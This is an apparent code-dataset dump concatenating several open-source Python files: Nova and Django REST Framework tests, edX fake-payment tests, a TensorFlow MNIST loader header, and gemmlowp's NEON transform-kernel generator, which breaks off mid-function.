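#   >>> attrs = parse_m3u8_attributes('BANDWIDTH=1280000,CODECS="mp4a.40.2,avc1.64001f"')
#   >>> attrs == {'BANDWIDTH': '1280000', 'CODECS': 'mp4a.40.2,avc1.64001f'}
#   True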
def urshift(val, n):
return val >> n if val >= 0 else (val + 0x100000000) >> n
|
j-carpentier/nova
|
refs/heads/master
|
nova/tests/functional/api_sample_tests/test_extended_availability_zone.py
|
21
|
# Copyright 2012 Nebula, Inc.
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from nova.tests.functional.api_sample_tests import test_servers
CONF = cfg.CONF
CONF.import_opt('osapi_compute_extension',
'nova.api.openstack.compute.legacy_v2.extensions')
class ExtendedAvailabilityZoneJsonTests(test_servers.ServersSampleBase):
extension_name = "os-extended-availability-zone"
def _get_flags(self):
f = super(ExtendedAvailabilityZoneJsonTests, self)._get_flags()
f['osapi_compute_extension'] = CONF.osapi_compute_extension[:]
f['osapi_compute_extension'].append(
'nova.api.openstack.compute.contrib.keypairs.Keypairs')
f['osapi_compute_extension'].append(
'nova.api.openstack.compute.contrib.extended_availability_zone.'
'Extended_availability_zone')
f['osapi_compute_extension'].append(
'nova.api.openstack.compute.contrib.extended_ips.Extended_ips')
f['osapi_compute_extension'].append(
'nova.api.openstack.compute.contrib.extended_ips_mac.'
'Extended_ips_mac')
return f
def test_show(self):
uuid = self._post_server()
response = self._do_get('servers/%s' % uuid)
subs = self._get_regexes()
subs['hostid'] = '[a-f0-9]+'
subs['access_ip_v4'] = '1.2.3.4'
subs['access_ip_v6'] = '80fe::'
self._verify_response('server-get-resp', subs, response, 200)
def test_detail(self):
self._post_server()
response = self._do_get('servers/detail')
subs = self._get_regexes()
subs['hostid'] = '[a-f0-9]+'
subs['access_ip_v4'] = '1.2.3.4'
subs['access_ip_v6'] = '80fe::'
self._verify_response('servers-detail-resp', subs, response, 200)
|
d0ugal/django-rest-framework
|
refs/heads/master
|
tests/test_serializer.py
|
5
|
# coding: utf-8
from __future__ import unicode_literals
from .utils import MockObject
from rest_framework import serializers
from rest_framework.compat import unicode_repr
import pickle
import pytest
# Tests for core functionality.
# -----------------------------
class TestSerializer:
def setup(self):
class ExampleSerializer(serializers.Serializer):
char = serializers.CharField()
integer = serializers.IntegerField()
self.Serializer = ExampleSerializer
def test_valid_serializer(self):
serializer = self.Serializer(data={'char': 'abc', 'integer': 123})
assert serializer.is_valid()
assert serializer.validated_data == {'char': 'abc', 'integer': 123}
assert serializer.errors == {}
def test_invalid_serializer(self):
serializer = self.Serializer(data={'char': 'abc'})
assert not serializer.is_valid()
assert serializer.validated_data == {}
assert serializer.errors == {'integer': ['This field is required.']}
def test_partial_validation(self):
serializer = self.Serializer(data={'char': 'abc'}, partial=True)
assert serializer.is_valid()
assert serializer.validated_data == {'char': 'abc'}
assert serializer.errors == {}
def test_empty_serializer(self):
serializer = self.Serializer()
assert serializer.data == {'char': '', 'integer': None}
def test_missing_attribute_during_serialization(self):
class MissingAttributes:
pass
instance = MissingAttributes()
serializer = self.Serializer(instance)
with pytest.raises(AttributeError):
serializer.data
class TestValidateMethod:
def test_non_field_error_validate_method(self):
class ExampleSerializer(serializers.Serializer):
char = serializers.CharField()
integer = serializers.IntegerField()
def validate(self, attrs):
raise serializers.ValidationError('Non field error')
serializer = ExampleSerializer(data={'char': 'abc', 'integer': 123})
assert not serializer.is_valid()
assert serializer.errors == {'non_field_errors': ['Non field error']}
def test_field_error_validate_method(self):
class ExampleSerializer(serializers.Serializer):
char = serializers.CharField()
integer = serializers.IntegerField()
def validate(self, attrs):
raise serializers.ValidationError({'char': 'Field error'})
serializer = ExampleSerializer(data={'char': 'abc', 'integer': 123})
assert not serializer.is_valid()
assert serializer.errors == {'char': ['Field error']}
class TestBaseSerializer:
def setup(self):
class ExampleSerializer(serializers.BaseSerializer):
def to_representation(self, obj):
return {
'id': obj['id'],
'email': obj['name'] + '@' + obj['domain']
}
def to_internal_value(self, data):
name, domain = str(data['email']).split('@')
return {
'id': int(data['id']),
'name': name,
'domain': domain,
}
self.Serializer = ExampleSerializer
def test_serialize_instance(self):
instance = {'id': 1, 'name': 'tom', 'domain': 'example.com'}
serializer = self.Serializer(instance)
assert serializer.data == {'id': 1, 'email': 'tom@example.com'}
def test_serialize_list(self):
instances = [
{'id': 1, 'name': 'tom', 'domain': 'example.com'},
{'id': 2, 'name': 'ann', 'domain': 'example.com'},
]
serializer = self.Serializer(instances, many=True)
assert serializer.data == [
{'id': 1, 'email': 'tom@example.com'},
{'id': 2, 'email': 'ann@example.com'}
]
def test_validate_data(self):
data = {'id': 1, 'email': 'tom@example.com'}
serializer = self.Serializer(data=data)
assert serializer.is_valid()
assert serializer.validated_data == {
'id': 1,
'name': 'tom',
'domain': 'example.com'
}
def test_validate_list(self):
data = [
{'id': 1, 'email': 'tom@example.com'},
{'id': 2, 'email': 'ann@example.com'},
]
serializer = self.Serializer(data=data, many=True)
assert serializer.is_valid()
assert serializer.validated_data == [
{'id': 1, 'name': 'tom', 'domain': 'example.com'},
{'id': 2, 'name': 'ann', 'domain': 'example.com'}
]
class TestStarredSource:
"""
Tests for `source='*'` argument, which is used for nested representations.
For example:
nested_field = NestedField(source='*')
"""
data = {
'nested1': {'a': 1, 'b': 2},
'nested2': {'c': 3, 'd': 4}
}
def setup(self):
class NestedSerializer1(serializers.Serializer):
a = serializers.IntegerField()
b = serializers.IntegerField()
class NestedSerializer2(serializers.Serializer):
c = serializers.IntegerField()
d = serializers.IntegerField()
class TestSerializer(serializers.Serializer):
nested1 = NestedSerializer1(source='*')
nested2 = NestedSerializer2(source='*')
self.Serializer = TestSerializer
def test_nested_validate(self):
"""
A nested representation is validated into a flat internal object.
"""
serializer = self.Serializer(data=self.data)
assert serializer.is_valid()
assert serializer.validated_data == {
'a': 1,
'b': 2,
'c': 3,
'd': 4
}
def test_nested_serialize(self):
"""
An object can be serialized into a nested representation.
"""
instance = {'a': 1, 'b': 2, 'c': 3, 'd': 4}
serializer = self.Serializer(instance)
assert serializer.data == self.data
class TestIncorrectlyConfigured:
def test_incorrect_field_name(self):
class ExampleSerializer(serializers.Serializer):
incorrect_name = serializers.IntegerField()
class ExampleObject:
def __init__(self):
self.correct_name = 123
instance = ExampleObject()
serializer = ExampleSerializer(instance)
with pytest.raises(AttributeError) as exc_info:
serializer.data
msg = str(exc_info.value)
assert msg.startswith(
"Got AttributeError when attempting to get a value for field `incorrect_name` on serializer `ExampleSerializer`.\n"
"The serializer field might be named incorrectly and not match any attribute or key on the `ExampleObject` instance.\n"
"Original exception text was:"
)
class TestUnicodeRepr:
def test_unicode_repr(self):
class ExampleSerializer(serializers.Serializer):
example = serializers.CharField()
class ExampleObject:
def __init__(self):
self.example = '한국'
def __repr__(self):
return unicode_repr(self.example)
instance = ExampleObject()
serializer = ExampleSerializer(instance)
repr(serializer) # Should not error.
class TestNotRequiredOutput:
def test_not_required_output_for_dict(self):
"""
'required=False' should allow a dictionary key to be missing in output.
"""
class ExampleSerializer(serializers.Serializer):
omitted = serializers.CharField(required=False)
included = serializers.CharField()
serializer = ExampleSerializer(data={'included': 'abc'})
serializer.is_valid()
assert serializer.data == {'included': 'abc'}
def test_not_required_output_for_object(self):
"""
'required=False' should allow an object attribute to be missing in output.
"""
class ExampleSerializer(serializers.Serializer):
omitted = serializers.CharField(required=False)
included = serializers.CharField()
def create(self, validated_data):
return MockObject(**validated_data)
serializer = ExampleSerializer(data={'included': 'abc'})
serializer.is_valid()
serializer.save()
assert serializer.data == {'included': 'abc'}
def test_default_required_output_for_dict(self):
"""
'default="something"' should require dictionary key.
We need to handle this as the field will have an implicit
'required=False', but it should still have a value.
"""
class ExampleSerializer(serializers.Serializer):
omitted = serializers.CharField(default='abc')
included = serializers.CharField()
serializer = ExampleSerializer({'included': 'abc'})
with pytest.raises(KeyError):
serializer.data
def test_default_required_output_for_object(self):
"""
'default="something"' should require object attribute.
We need to handle this as the field will have an implicit
'required=False', but it should still have a value.
"""
class ExampleSerializer(serializers.Serializer):
omitted = serializers.CharField(default='abc')
included = serializers.CharField()
instance = MockObject(included='abc')
serializer = ExampleSerializer(instance)
with pytest.raises(AttributeError):
serializer.data
class TestCacheSerializerData:
def test_cache_serializer_data(self):
"""
Caching serializer data with pickle will drop the serializer info,
but does preserve the data itself.
"""
class ExampleSerializer(serializers.Serializer):
field1 = serializers.CharField()
field2 = serializers.CharField()
serializer = ExampleSerializer({'field1': 'a', 'field2': 'b'})
pickled = pickle.dumps(serializer.data)
data = pickle.loads(pickled)
assert data == {'field1': 'a', 'field2': 'b'}
|
sbalde/edxplatform
|
refs/heads/master
|
lms/djangoapps/shoppingcart/tests/test_payment_fake.py
|
147
|
"""
Tests for the fake payment page used in acceptance tests.
"""
from django.test import TestCase
from shoppingcart.processors.CyberSource2 import sign, verify_signatures
from shoppingcart.processors.exceptions import CCProcessorSignatureException
from shoppingcart.tests.payment_fake import PaymentFakeView
from collections import OrderedDict
class PaymentFakeViewTest(TestCase):
"""
Test that the fake payment view interacts
correctly with the shopping cart.
"""
CLIENT_POST_PARAMS = OrderedDict([
('amount', '25.00'),
('currency', 'usd'),
('transaction_type', 'sale'),
('orderNumber', '33'),
('access_key', '123456789'),
('merchantID', 'edx'),
('djch', '012345678912'),
('orderPage_version', 2),
('orderPage_serialNumber', '1234567890'),
('profile_id', "00000001"),
('reference_number', 10),
('locale', 'en'),
('signed_date_time', '2014-08-18T13:59:31Z'),
])
def setUp(self):
super(PaymentFakeViewTest, self).setUp()
# Reset the view state
PaymentFakeView.PAYMENT_STATUS_RESPONSE = "success"
def test_accepts_client_signatures(self):
# Generate shoppingcart signatures
post_params = sign(self.CLIENT_POST_PARAMS)
# Simulate a POST request from the payment workflow
# page to the fake payment page.
resp = self.client.post(
'/shoppingcart/payment_fake', dict(post_params)
)
# Expect that the response was successful
self.assertEqual(resp.status_code, 200)
# Expect that we were served the payment page
# (not the error page)
self.assertIn("Payment Form", resp.content)
def test_rejects_invalid_signature(self):
# Generate shoppingcart signatures
post_params = sign(self.CLIENT_POST_PARAMS)
# Tamper with the signature
post_params['signature'] = "invalid"
# Simulate a POST request from the payment workflow
# page to the fake payment page.
resp = self.client.post(
'/shoppingcart/payment_fake', dict(post_params)
)
# Expect that we got an error
self.assertIn("Error", resp.content)
def test_sends_valid_signature(self):
# Generate shoppingcart signatures
post_params = sign(self.CLIENT_POST_PARAMS)
# Get the POST params that the view would send back to us
resp_params = PaymentFakeView.response_post_params(post_params)
# Check that the client accepts these
try:
verify_signatures(resp_params)
except CCProcessorSignatureException:
self.fail("Client rejected signatures.")
def test_set_payment_status(self):
# Generate shoppingcart signatures
post_params = sign(self.CLIENT_POST_PARAMS)
# Configure the view to declined payments
resp = self.client.put(
'/shoppingcart/payment_fake',
data="decline", content_type='text/plain'
)
self.assertEqual(resp.status_code, 200)
# Check that the decision is "DECLINE"
resp_params = PaymentFakeView.response_post_params(post_params)
self.assertEqual(resp_params.get('decision'), 'DECLINE')
# Configure the view to fail payments
resp = self.client.put(
'/shoppingcart/payment_fake',
data="failure", content_type='text/plain'
)
self.assertEqual(resp.status_code, 200)
# Check that the decision is "REJECT"
resp_params = PaymentFakeView.response_post_params(post_params)
self.assertEqual(resp_params.get('decision'), 'REJECT')
# Configure the view to accept payments
resp = self.client.put(
'/shoppingcart/payment_fake',
data="success", content_type='text/plain'
)
self.assertEqual(resp.status_code, 200)
# Check that the decision is "ACCEPT"
resp_params = PaymentFakeView.response_post_params(post_params)
self.assertEqual(resp_params.get('decision'), 'ACCEPT')
|
davidenitti/ML
|
refs/heads/master
|
autoencoders/input_data.py
|
165
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functions for downloading and reading MNIST data."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gzip
import os
import tempfile
import numpy
from six.moves import urllib
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
from tensorflow.contrib.learn.python.learn.datasets.mnist import read_data_sets
|
maciekcc/gemmlowp
|
refs/heads/master
|
meta/generators/transform_kernels_common.py
|
7
|
# Copyright 2016 The Gemmlowp Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""."""
import common
def _DuplicateGeneralRegister(size, emitter, registers, value, min_register):
register = registers.QuadRegister(min_register)
emitter.EmitVDup(size, register, value)
return register
def _DuplicateGeneralMemoryRegister(size, emitter, registers, value,
min_register):
register = registers.QuadRegister(min_register)
general = registers.GeneralRegister()
emitter.EmitLdr(general, value)
emitter.EmitVDup(size, register, general)
registers.FreeRegister(general)
return register
class MinMaxTransformation(object):
"""."""
def Check(self, in_type, out_type, kernel_size, leftovers):
assert in_type is 'uint8_t'
assert out_type is 'uint8_t'
assert kernel_size is 16
assert leftovers < 16
def Prepare(self, emitter, registers, unused_kernel_size):
emitter.EmitNewline()
emitter.EmitComment('MinMax::Prepare')
self.min = _DuplicateGeneralRegister(8, emitter, registers,
registers.MapParameter('min',
'params.min'),
4)
self.max = _DuplicateGeneralRegister(8, emitter, registers,
registers.MapParameter('max',
'params.max'),
4)
def Transform(self, emitter, registers, input_address, elements,
output_address):
"""Generate the MinMax transform inner loop code."""
emitter.EmitNewline()
emitter.EmitComment('MinMax::Transform')
register_count = (elements + 15) / 16
load = [registers.QuadRegister() for unused_i in range(register_count)]
emitter.EmitVLoadAE(8, elements, load, input_address, None)
emitter.EmitPldOffset(input_address, emitter.ImmediateConstant(16))
for register in load:
emitter.EmitVMax('u8', register, register, self.min)
for register in load:
emitter.EmitVMin('u8', register, register, self.max)
emitter.EmitNewline()
emitter.EmitVStoreAE(8, elements, load, output_address, None)
emitter.EmitPld(output_address)
registers.FreeRegisters(load)
class DequantizeTransformation(object):
"""."""
def Check(self, in_type, out_type, kernel_size, leftovers):
assert in_type is 'uint8_t'
assert out_type is 'float'
assert kernel_size is 16
assert leftovers < 16
def Prepare(self, emitter, registers, unused_kernel_size):
"""Duplicate quantization offsets to vector registers."""
emitter.EmitNewline()
emitter.EmitComment('Dequantize::Prepare')
self.range_min = _DuplicateGeneralRegister(
32, emitter, registers,
registers.MapParameter('range_min', 'params.range_min'), 4)
self.range_offset = _DuplicateGeneralRegister(
32, emitter, registers,
registers.MapParameter('range_offset', 'params.range_offset'), 4)
self.range_scale = _DuplicateGeneralRegister(
32, emitter, registers,
registers.MapParameter('range_scale', 'params.range_scale'), 4)
def Transform(self, emitter, registers, input_address, elements,
output_address):
"""Emit the dequantization inner loop."""
emitter.EmitNewline()
emitter.EmitComment('Dequantize::Transform')
register_count = (elements + 3) / 4
load = [registers.QuadRegister() for unused_i in range(register_count)]
emitter.EmitVLoadAE(8, elements, load, input_address, None)
emitter.EmitPldOffset(input_address, emitter.ImmediateConstant(32))
if len(load) is 1:
emitter.EmitVMovl('u8', load[0], load[0])
emitter.EmitVMovl('s16', load[0], load[0])
elif len(load) is 2:
emitter.EmitVMovl('u8', load[0], load[0])
emitter.EmitVMovl2('s16', load[0], load[1], load[0])
elif len(load) is 3:
emitter.EmitVMovl2('u8', load[0], load[1], load[0])
emitter.EmitVMovl('s16', load[2], load[1])
emitter.EmitVMovl2('s16', load[0], load[1], load[0])
elif len(load) is 4:
emitter.EmitVMovl2('u8', load[0], load[1], load[0])
emitter.EmitVMovl2('s16', load[2], load[3], load[1])
emitter.EmitVMovl2('s16', load[0], load[1], load[0])
else:
assert False
for register in load:
emitter.EmitVCvt('f32', 's32', register, register)
for register in load:
emitter.EmitVSub('f32', register, register, self.range_offset)
for register in load:
emitter.EmitVMul('f32', register, register, self.range_scale)
for register in load:
emitter.EmitVAdd('f32', register, register, self.range_min)
emitter.EmitNewline()
emitter.EmitVStoreAE(32, elements, load, output_address, None)
emitter.EmitPld(output_address)
registers.FreeRegisters(load)
class QuantizeTransformation(object):
"""."""
def Check(self, in_type, out_type, kernel_size, leftovers):
assert in_type is 'float'
assert out_type is 'uint8_t'
assert kernel_size is 16
assert leftovers < 16
def Prepare(self, emitter, registers, unused_kernel_size):
"""Duplicate quantization offsets to vector registers."""
emitter.EmitNewline()
emitter.EmitComment('Quantize::Prepare')
self.range_min = _DuplicateGeneralRegister(
32, emitter, registers,
registers.MapParameter('range_min', 'params.range_min'), 4)
self.range_offset = _DuplicateGeneralRegister(
32, emitter, registers,
registers.MapParameter('range_offset', 'params.range_offset'), 4)
self.range_scale = _DuplicateGeneralRegister(
32, emitter, registers,
registers.MapParameter('range_scale', 'params.range_scale'), 4)
def Transform(self, emitter, registers, input_address, elements,
output_address):
"""Emit quantization inner loop code."""
emitter.EmitNewline()
emitter.EmitComment('Quantize::Transform')
register_count = (elements + 3) / 4
load = [registers.QuadRegister() for unused_i in range(register_count)]
emitter.EmitVLoadAE(32, elements, load, input_address, None)
emitter.EmitPldOffset(input_address, emitter.ImmediateConstant(64))
for register in load:
emitter.EmitVSub('f32', register, register, self.range_min)
for register in load:
emitter.EmitVMul('f32', register, register, self.range_scale)
for register in load:
emitter.EmitVAdd('f32', register, register, self.range_offset)
for register in load:
emitter.EmitVCvt('s32', 'f32', register, register)
if len(load) is 1:
emitter.EmitVQmovn('s32', load[0], load[0])
emitter.EmitVQmovun('s16', load[0], load[0])
elif len(load) is 2:
emitter.EmitVQmovn2('s32', load[0], load[0], load[1])
emitter.EmitVQmovun('s16', load[0], load[0])
elif len(load) is 3:
emitter.EmitVQmovn2('s32', load[0], load[0], load[1])
emitter.EmitVQmovn('s32', load[2], load[2])
emitter.EmitVQmovun2('s16', load[0], load[0], load[2])
elif len(load) is 4:
emitter.EmitVQmovn2('s32', load[0], load[0], load[1])
emitter.EmitVQmovn2('s32', load[2], load[2], load[3])
emitter.EmitVQmovun2('s16', load[0], load[0], load[2])
else:
assert False
emitter.EmitNewline()
emitter.EmitVStoreAE(8, elements, load, output_address, None)
emitter.EmitPld(output_address)
registers.FreeRegisters(load)
class RequantizeTransformation(object):
"""."""
def Check(self, in_type, out_type, kernel_size, leftovers):
assert in_type is 'int32_t'
assert out_type is 'uint8_t'
assert kernel_size is 16
assert leftovers < 16
def Prepare(self, emitter, registers, unused_kernel_size):
"""Duplicate quantization parameters to vector registers."""
emitter.EmitNewline()
emitter.EmitComment('Requantize::Prepare')
self.range_min_delta = _DuplicateGeneralRegister(
32, emitter, registers,
registers.MapParameter('input_range_min', 'params.input_range_min'), 4)
self.output_range_min = _DuplicateGeneralRegister(
32, emitter, registers,
registers.MapParameter('output_range_min', 'params.output_range_min'),
4)
self.input_range_offset = _DuplicateGeneralRegister(
32, emitter, registers,
registers.MapParameter('input_range_offset',
'params.input_range_offset'), 4)
self.input_range_scale = _DuplicateGeneralRegister(
32, emitter, registers,
registers.MapParameter('input_range_scale', 'params.input_range_scale'),
4)
self.one_over_output_range_scale = _DuplicateGeneralRegister(
32, emitter, registers,
registers.MapParameter('one_over_output_range_scale',
'params.one_over_output_range_scale'), 4)
emitter.EmitVSub('f32', self.range_min_delta, self.range_min_delta,
self.output_range_min)
def Transform(self, emitter, registers, input_address, elements,
output_address):
"""Emit requantization inner loop code."""
emitter.EmitNewline()
emitter.EmitComment('Requantize::Transform')
register_count = (elements + 3) / 4
load = [registers.QuadRegister() for unused_i in range(register_count)]
emitter.EmitVLoadAE(32, elements, load, input_address, None)
emitter.EmitPldOffset(input_address, emitter.ImmediateConstant(64))
for register in load:
emitter.EmitVCvt('f32', 's32', register, register)
for register in load:
emitter.EmitVSub('f32', register, register, self.input_range_offset)
for register in load:
emitter.EmitVMul('f32', register, register, self.input_range_scale)
for register in load:
emitter.EmitVAdd('f32', register, register, self.range_min_delta)
for register in load:
emitter.EmitVMul('f32', register, register,
self.one_over_output_range_scale)
for register in load:
emitter.EmitVCvt('s32', 'f32', register, register)
    if len(load) == 1:
emitter.EmitVQmovn('s32', load[0], load[0])
emitter.EmitVQmovun('s16', load[0], load[0])
    elif len(load) == 2:
emitter.EmitVQmovn2('s32', load[0], load[0], load[1])
emitter.EmitVQmovun('s16', load[0], load[0])
    elif len(load) == 3:
emitter.EmitVQmovn2('s32', load[0], load[0], load[1])
emitter.EmitVQmovn('s32', load[2], load[2])
emitter.EmitVQmovun2('s16', load[0], load[0], load[2])
    elif len(load) == 4:
emitter.EmitVQmovn2('s32', load[0], load[0], load[1])
emitter.EmitVQmovn2('s32', load[2], load[2], load[3])
emitter.EmitVQmovun2('s16', load[0], load[0], load[2])
else:
assert False
emitter.EmitNewline()
emitter.EmitVStoreAE(8, elements, load, output_address, None)
emitter.EmitPld(output_address)
registers.FreeRegisters(load)
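# A minimal scalar sketch (reference only, not used by the generator) of the
# Requantize arithmetic emitted above; the params dict keys mirror the
# duplicated parameter registers set up in Prepare.
def _requantize_scalar_reference(value_s32, params):
  """Reference: rescale one int32_t value into the uint8_t output range."""
  value = (float(value_s32) - params['input_range_offset']) * params['input_range_scale']
  value += params['input_range_min'] - params['output_range_min']
  return max(0, min(255, int(value * params['one_over_output_range_scale'])))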
class BaseTransform(common.Transform1DKernelGenerator):
"""."""
def __init__(self, cc_emitter, kernel_name, asm_emitter, transformation):
common.Transform1DKernelGenerator.__init__(self, cc_emitter, kernel_name)
self.asm_emitter = asm_emitter
self.transformation = transformation
def EmitTransform(self, in_type, out_type, kernel_size, leftovers):
"""."""
self.transformation.Check(in_type, out_type, kernel_size, leftovers)
registers = self.asm_emitter.CreateRegisters()
self.emitter.EmitDeclare('int', 'params_count_copy', 'params.count')
self.asm_emitter.PushIndent(self.emitter.indent)
self.asm_emitter.EmitAsmBegin()
count = registers.MapOutputParameter('count', 'params_count_copy')
input_address = registers.MapOutputParameter('input')
output_address = registers.MapOutputParameter('output')
self.transformation.Prepare(self.asm_emitter, registers, kernel_size)
if leftovers:
self.asm_emitter.EmitNewline()
self.asm_emitter.EmitComment('Reduce count by leftovers.')
self.asm_emitter.EmitSubs(count, count,
self.asm_emitter.ImmediateConstant(leftovers))
self.asm_emitter.EmitBeqFront(2)
self.asm_emitter.EmitNewline()
self.asm_emitter.EmitNumericalLabel(1)
self.asm_emitter.EmitSubs(count, count,
self.asm_emitter.ImmediateConstant(kernel_size))
self.transformation.Transform(self.asm_emitter, registers, input_address,
kernel_size, output_address)
self.asm_emitter.EmitNewline()
self.asm_emitter.EmitBneBack(1)
if leftovers:
self.asm_emitter.EmitNumericalLabel(2)
self.asm_emitter.EmitNewline()
self.asm_emitter.EmitComment('Handle leftovers.')
self.transformation.Transform(self.asm_emitter, registers, input_address,
leftovers, output_address)
self.asm_emitter.EmitAsmEnd(registers)
self.asm_emitter.PopIndent(len(self.emitter.indent))
class Requantize(BaseTransform):
"""."""
def __init__(self, cc_emitter, asm_emitter):
BaseTransform.__init__(self, cc_emitter, 'Requantize', asm_emitter,
RequantizeTransformation())
class Quantize(BaseTransform):
"""."""
def __init__(self, cc_emitter, asm_emitter):
BaseTransform.__init__(self, cc_emitter, 'Quantize', asm_emitter,
QuantizeTransformation())
class Dequantize(BaseTransform):
"""."""
def __init__(self, cc_emitter, asm_emitter):
BaseTransform.__init__(self, cc_emitter, 'Dequantize', asm_emitter,
DequantizeTransformation())
class MinMax(BaseTransform):
"""."""
def __init__(self, numerical_type, cc_emitter, asm_emitter):
BaseTransform.__init__(self, cc_emitter, 'MinMax<%s>' % numerical_type,
asm_emitter, MinMaxTransformation())
class BiasAdd(common.Transform1DKernelGenerator):
"""."""
def __init__(self, bias_type, cc_emitter, asm_emitter):
common.Transform1DKernelGenerator.__init__(self, cc_emitter,
'BiasAdd<%s>' % bias_type)
self.asm_emitter = asm_emitter
def EmitTransform(self, in_type, out_type, kernel_size, leftovers):
"""."""
    assert in_type == 'uint8_t'
    assert out_type == 'int32_t'
    assert kernel_size == 16
assert leftovers < 16
registers = self.asm_emitter.CreateRegisters()
self.emitter.EmitDeclare('int', 'params_rows_copy', 'params.rows')
self.asm_emitter.PushIndent(self.emitter.indent)
self.asm_emitter.EmitAsmBegin()
self._Prepare(self.asm_emitter, registers)
rows = registers.MapParameter('rows', 'params_rows_copy')
self.asm_emitter.EmitNumericalLabel(1)
self._ProcessRow(self.asm_emitter, registers, kernel_size, leftovers)
self.asm_emitter.EmitSubs(rows, rows, self.asm_emitter.ImmediateConstant(1))
self.asm_emitter.EmitBneBack(1)
self.asm_emitter.EmitAsmEnd(registers)
self.asm_emitter.PopIndent(len(self.emitter.indent))
def _Prepare(self, emitter, registers):
self.input_range_min = _DuplicateGeneralMemoryRegister(
32, emitter, registers,
registers.MapMemoryParameter('input_range_min',
'params.input_range_min'), 8)
self.input_range_scale = _DuplicateGeneralMemoryRegister(
32, emitter, registers,
registers.MapMemoryParameter('input_range_scale',
'params.input_range_scale'), 8)
self.bias_range_min = _DuplicateGeneralMemoryRegister(
32, emitter, registers,
registers.MapMemoryParameter('bias_range_min', 'params.bias_range_min'),
8)
self.bias_range_scale = _DuplicateGeneralMemoryRegister(
32, emitter, registers,
registers.MapMemoryParameter('bias_range_scale',
'params.bias_range_scale'), 8)
self.output_range_min = _DuplicateGeneralMemoryRegister(
32, emitter, registers,
registers.MapMemoryParameter('output_range_min',
'params.output_range_min'), 8)
self.one_over_output_range_scale = _DuplicateGeneralMemoryRegister(
32, emitter, registers,
registers.MapMemoryParameter('one_over_output_range_scale',
'params.one_over_output_range_scale'), 8)
self.output_range_offset = _DuplicateGeneralMemoryRegister(
32, emitter, registers,
registers.MapMemoryParameter('output_range_offset',
'params.output_range_offset'), 8)
def _ProcessRow(self, emitter, registers, kernel_size, leftovers):
const_count = registers.MapParameter('count', 'params.count')
const_bias = registers.MapParameter('bias', 'params.bias')
count = registers.GeneralRegister()
bias = registers.GeneralRegister()
input_address = registers.MapOutputParameter('input')
output_address = registers.MapOutputParameter('output')
emitter.EmitMov(count, const_count)
emitter.EmitMov(bias, const_bias)
if leftovers:
emitter.EmitSubs(count, count, emitter.ImmediateConstant(leftovers))
emitter.EmitBeqFront(3)
emitter.EmitNumericalLabel(2)
emitter.EmitSubs(count, count, emitter.ImmediateConstant(kernel_size))
self._BiasAdd(emitter, registers, kernel_size, input_address, bias,
output_address)
emitter.EmitBneBack(2)
if leftovers:
emitter.EmitNumericalLabel(3)
self._BiasAdd(emitter, registers, leftovers, input_address, bias,
output_address)
def _BiasAdd(self, emitter, registers, elements, input_address, bias,
output_address):
emitter.EmitNewline()
emitter.EmitComment('BiasAdd::Transform')
register_count = (elements + 3) / 4
load_input = [
registers.QuadRegister() for unused_i in range(register_count)
]
load_bias = [registers.QuadRegister() for unused_i in range(register_count)]
emitter.EmitVLoadAE(8, elements, load_input, input_address, None)
emitter.EmitVLoadAE(8, elements, load_bias, bias, None)
emitter.EmitPldOffset(input_address, emitter.ImmediateConstant(32))
    if len(load_input) == 1:
emitter.EmitVMovl('u8', load_input[0], load_input[0])
emitter.EmitVMovl('u8', load_bias[0], load_bias[0])
emitter.EmitVMovl('s16', load_input[0], load_input[0])
emitter.EmitVMovl('s16', load_bias[0], load_bias[0])
    elif len(load_input) == 2:
emitter.EmitVMovl('u8', load_input[0], load_input[0])
emitter.EmitVMovl('u8', load_bias[0], load_bias[0])
emitter.EmitVMovl2('s16', load_input[0], load_input[1], load_input[0])
emitter.EmitVMovl2('s16', load_bias[0], load_bias[1], load_bias[0])
    elif len(load_input) == 3:
emitter.EmitVMovl2('u8', load_input[0], load_input[1], load_input[0])
emitter.EmitVMovl2('u8', load_bias[0], load_bias[1], load_bias[0])
emitter.EmitVMovl('s16', load_input[2], load_input[1])
emitter.EmitVMovl('s16', load_bias[2], load_bias[1])
emitter.EmitVMovl2('s16', load_input[0], load_input[1], load_input[0])
emitter.EmitVMovl2('s16', load_bias[0], load_bias[1], load_bias[0])
    elif len(load_input) == 4:
emitter.EmitVMovl2('u8', load_input[0], load_input[1], load_input[0])
emitter.EmitVMovl2('u8', load_bias[0], load_bias[1], load_bias[0])
emitter.EmitVMovl2('s16', load_input[2], load_input[3], load_input[1])
emitter.EmitVMovl2('s16', load_bias[2], load_bias[3], load_bias[1])
emitter.EmitVMovl2('s16', load_input[0], load_input[1], load_input[0])
emitter.EmitVMovl2('s16', load_bias[0], load_bias[1], load_bias[0])
else:
assert False
for register in load_input + load_bias:
emitter.EmitVCvt('f32', 's32', register, register)
for register in load_input:
emitter.EmitVMul('f32', register, register, self.input_range_scale)
for register in load_bias:
emitter.EmitVMul('f32', register, register, self.bias_range_scale)
for register in load_input:
emitter.EmitVAdd('f32', register, register, self.input_range_min)
for register in load_bias:
emitter.EmitVAdd('f32', register, register, self.bias_range_min)
for (register_1, register_2) in zip(load_input, load_bias):
emitter.EmitVAdd('f32', register_1, register_1, register_2)
for register in load_input:
